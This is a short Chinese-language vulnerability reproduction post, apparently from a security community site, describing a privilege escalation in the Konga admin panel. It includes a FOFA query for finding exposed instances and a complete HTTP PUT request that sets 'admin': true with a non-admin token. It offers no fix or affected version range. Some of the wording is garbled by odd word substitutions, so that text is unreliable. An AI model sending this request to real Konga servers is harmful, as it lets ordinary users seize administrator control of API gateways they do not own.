Konga 普通用户越权获取管理员权限漏洞

破绽描绘

Konga 普通用户经过发送特殊的恳求可越权获取管理员权限
 


 

破绽影响

Konga
 


 

破绽复现

FOFA

"konga"

登录页面

图片[1]-Konga 普通用户越权获取管理员权限漏洞-孤勇者社区

创立非管理员用户后登录并获取token

图片[2]-Konga 普通用户越权获取管理员权限漏洞-孤勇者社区

发送恳求包, 将token修正为刚刚获取的

PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241

{
  "admin": true,
  "passports": {
    "password": "1234abcd",
    "protocol": "local"
  },
  "password_confirmation": "1234abcd",
  "token": "non-administrator user token"
}

图片[3]-Konga 普通用户越权获取管理员权限漏洞-孤勇者社区

胜利转为管理员用户

图片[4]-Konga 普通用户越权获取管理员权限漏洞-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片